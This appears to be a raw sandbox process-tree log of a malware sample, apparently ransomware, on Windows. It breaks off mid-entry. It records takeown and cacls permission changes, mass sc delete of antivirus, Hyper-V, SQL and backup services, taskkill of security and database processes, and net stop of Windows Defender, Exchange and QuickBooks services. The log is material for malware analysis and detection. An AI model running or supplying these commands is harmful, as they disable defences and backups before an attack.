C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3420
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:4056
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3668
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵PID:3664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3684
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:2008
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:3464
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1108
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1232
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵PID:3692
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
PID:2508 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:268
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2324
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:296
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:1236
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:4236
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:980
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1656
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵PID:1048
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4356
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3560
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:1648
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:2336
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵PID:624
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4120
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
PID:3316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4732
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f3⤵PID:4116
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r3⤵PID:920
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵PID:508
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2344
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE3⤵PID:1408
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1316
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵PID:1004
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2468
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"3⤵PID:2196
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1632
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1468
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system3⤵PID:3628
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵PID:3760
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2960
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
PID:4768 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3528
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f3⤵PID:3604
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:876
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r3⤵PID:764
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1324
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵PID:3728
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:396
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE3⤵PID:436
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵PID:2952
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3768
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"3⤵PID:4988
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4088
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system3⤵PID:5048
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵PID:3992
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5112
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵PID:1868
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
- Launches sc.exe
PID:1864 -
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵
- Launches sc.exe
PID:2444 -
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵PID:3984
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵PID:636
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵PID:3068
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵PID:3128
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵
- Launches sc.exe
PID:5056 -
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵PID:2476
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵PID:4124
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵PID:1532
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
- Launches sc.exe
PID:3680 -
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵PID:4592
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵PID:1664
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵PID:316
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
PID:4332 -
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵PID:2348
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵PID:3664
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵
- Launches sc.exe
PID:3996 -
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:3656
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵PID:1252
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵PID:4572
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵PID:4528
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵PID:2432
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵PID:280
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵PID:2324
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵PID:268
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵PID:4252
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵PID:208
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵PID:3980
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵PID:3732
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵PID:4744
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵
- Launches sc.exe
PID:4396 -
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵PID:980
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:2104
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵PID:4352
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵PID:4136
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵PID:672
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵PID:4140
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵PID:5028
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵
- Launches sc.exe
PID:3944 -
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵PID:1652
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵PID:4184
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵PID:1924
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵PID:4564
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵PID:4676
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
- Launches sc.exe
PID:628 -
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵
- Launches sc.exe
PID:4500 -
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵PID:5076
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵PID:1128
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵PID:4828
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵PID:4552
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵PID:3764
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵PID:1004
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵PID:4580
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵PID:3468
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵
- Launches sc.exe
PID:1776 -
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵PID:3388
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵
- Launches sc.exe
PID:3636 -
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵PID:1404
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵PID:2328
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵PID:4764
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵PID:2140
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵PID:2164
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵PID:4392
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵PID:1248
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵PID:4688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.24⤵PID:4732
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
PID:3336 -
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵PID:3728
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
- Launches sc.exe
PID:396 -
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵PID:436
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵PID:4556
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵PID:5052
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵PID:1440
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵PID:4340
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵PID:5116
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵PID:4088
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵PID:5048
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵PID:4008
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵
- Launches sc.exe
PID:5100 -
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵PID:5088
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵
- Launches sc.exe
PID:1728 -
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵PID:1028
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵PID:1772
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵PID:1100
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵PID:1484
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵PID:1572
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵PID:2648
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵PID:1480
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵PID:2236
-
C:\Windows\SysWOW64\sc.exesc delete "McAfeeFramework"3⤵PID:4812
-
C:\Windows\SysWOW64\sc.exesc delete "macmnsvc"3⤵PID:3420
-
C:\Windows\SysWOW64\sc.exesc delete "masvc"3⤵PID:4544
-
C:\Windows\SysWOW64\sc.exesc delete "mfemms"3⤵PID:3644
-
C:\Windows\SysWOW64\sc.exesc delete "mfevtp"3⤵
- Launches sc.exe
PID:4056 -
C:\Windows\SysWOW64\sc.exesc delete "TmFilter"3⤵PID:552
-
C:\Windows\SysWOW64\sc.exesc delete "TMLWCSService"3⤵PID:4304
-
C:\Windows\SysWOW64\sc.exesc delete "tmusa"3⤵
- Launches sc.exe
PID:4900 -
C:\Windows\SysWOW64\sc.exesc delete "TmPreFilter"3⤵
- Launches sc.exe
PID:216 -
C:\Windows\SysWOW64\sc.exesc delete "TMSmartRelayService"3⤵PID:2460
-
C:\Windows\SysWOW64\sc.exesc delete "TMiCRCScanService"3⤵PID:1108
-
C:\Windows\SysWOW64\sc.exesc delete "VSApiNt"3⤵PID:3464
-
C:\Windows\SysWOW64\sc.exesc delete "TmCCSF"3⤵
- Launches sc.exe
PID:1880 -
C:\Windows\SysWOW64\sc.exesc delete "tmlisten"3⤵PID:4208
-
C:\Windows\SysWOW64\sc.exesc delete "TmProxy"3⤵
- Launches sc.exe
PID:2508 -
C:\Windows\SysWOW64\sc.exesc delete "ntrtscan"3⤵PID:292
-
C:\Windows\SysWOW64\sc.exesc delete "ofcservice"3⤵PID:2200
-
C:\Windows\SysWOW64\sc.exesc delete "TmPfw"3⤵PID:1332
-
C:\Windows\SysWOW64\sc.exesc delete "PccNTUpd"3⤵
- Launches sc.exe
PID:3404 -
C:\Windows\SysWOW64\sc.exesc delete "PandaAetherAgent"3⤵
- Launches sc.exe
PID:264 -
C:\Windows\SysWOW64\sc.exesc delete "PSUAService"3⤵PID:2516
-
C:\Windows\SysWOW64\sc.exesc delete "NanoServiceMain"3⤵PID:3660
-
C:\Windows\SysWOW64\sc.exesc delete "EPIntegrationService"3⤵PID:208
-
C:\Windows\SysWOW64\sc.exesc delete "EPProtectedService"3⤵
- Launches sc.exe
PID:2864 -
C:\Windows\SysWOW64\sc.exesc delete "EPRedline"3⤵PID:3108
-
C:\Windows\SysWOW64\sc.exesc delete "EPSecurityService"3⤵
- Launches sc.exe
PID:1656 -
C:\Windows\SysWOW64\sc.exesc delete "EPUpdateService"3⤵PID:4616
-
C:\Windows\SysWOW64\sc.exesc delete "UniFi"3⤵PID:4316
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im PccNTMon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4388 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im NTRtScan.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4272 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmListen.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmCCSF.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4184 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmProxy.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4084 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3376 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmPfw.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:508 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im CNTAoSMgr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4976 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlwriter.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msmdsrv.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:412 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlceip.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1284 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im Ssms.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im SQLAGENT.EXE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:820 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdhost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4764 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2164 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:876 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im ReportingServicesService.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msftesql.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3932 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im pg_ctl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im postgres.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460 -
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵PID:4264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵PID:4092
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$ISARS3⤵PID:1936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS4⤵PID:404
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$MSFW3⤵PID:4952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW4⤵PID:2132
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$ISARS3⤵PID:3136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS4⤵PID:2444
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$MSFW3⤵PID:2248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW4⤵PID:4364
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵PID:4568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵PID:2316
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$ISARS3⤵PID:3600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS4⤵PID:1956
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵PID:3372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵PID:1532
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4592
-
C:\Windows\SysWOW64\net.exenet stop mr2kserv3⤵PID:1664
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mr2kserv4⤵PID:3500
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology3⤵PID:4420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology4⤵PID:996
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFBA3⤵PID:3664
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFBA4⤵PID:2020
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS3⤵PID:216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS4⤵PID:3656
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA3⤵PID:1816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA4⤵PID:4572
-
C:\Windows\SysWOW64\net.exenet stop ShadowProtectSvc3⤵PID:4528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShadowProtectSvc4⤵PID:2508
-
C:\Windows\SysWOW64\net.exenet stop SPAdminV43⤵PID:292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPAdminV44⤵PID:2200
-
C:\Windows\SysWOW64\net.exenet stop SPTimerV43⤵PID:1332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTimerV44⤵PID:3404
-
C:\Windows\SysWOW64\net.exenet stop SPTraceV43⤵PID:264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTraceV44⤵PID:2516
-
C:\Windows\SysWOW64\net.exenet stop SPUserCodeV43⤵PID:3660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPUserCodeV44⤵PID:208
-
C:\Windows\SysWOW64\net.exenet stop SPWriterV43⤵PID:3564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPWriterV44⤵PID:3772
-
C:\Windows\SysWOW64\net.exenet stop SPSearch43⤵PID:980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPSearch44⤵PID:2104
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵PID:756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵PID:1328
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵PID:4136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵PID:3944
-
C:\Windows\SysWOW64\net.exenet stop firebirdguardiandefaultinstance3⤵PID:5028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop firebirdguardiandefaultinstance4⤵PID:624
-
C:\Windows\SysWOW64\net.exenet stop ibmiasrw3⤵PID:1216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ibmiasrw4⤵PID:1516
-
C:\Windows\SysWOW64\net.exenet stop QBCFMonitorService3⤵PID:4732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService4⤵PID:1084
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵PID:1200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵PID:1428
-
C:\Windows\SysWOW64\net.exenet stop QBPOSDBServiceV123⤵PID:4084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBPOSDBServiceV124⤵PID:3988
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Server (CProgramFilesIBMDominodata)"3⤵PID:5076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"4⤵PID:4808
-
C:\Windows\SysWOW64\net.exenet stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"3⤵PID:4828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"4⤵PID:1848
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵PID:4976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵PID:2180
-
C:\Windows\SysWOW64\net.exenet stop "Simply Accounting Database Connection Manager"3⤵PID:64
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"4⤵PID:2224
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB13⤵PID:3632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB14⤵PID:4300
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB23⤵PID:4308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB24⤵PID:3628
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB33⤵PID:412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB34⤵PID:4644
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB43⤵PID:4872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB44⤵PID:4936
-
C:\Windows\SysWOW64\net.exenet stop QuickBooksDB53⤵PID:3760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooksDB54⤵PID:4360
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im UniFi.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4768 -
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq MsMpEng.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2328 -
C:\Windows\SysWOW64\find.exefind /c "PID"3⤵PID:3172
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "imagename eq ntrtscan.exe"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
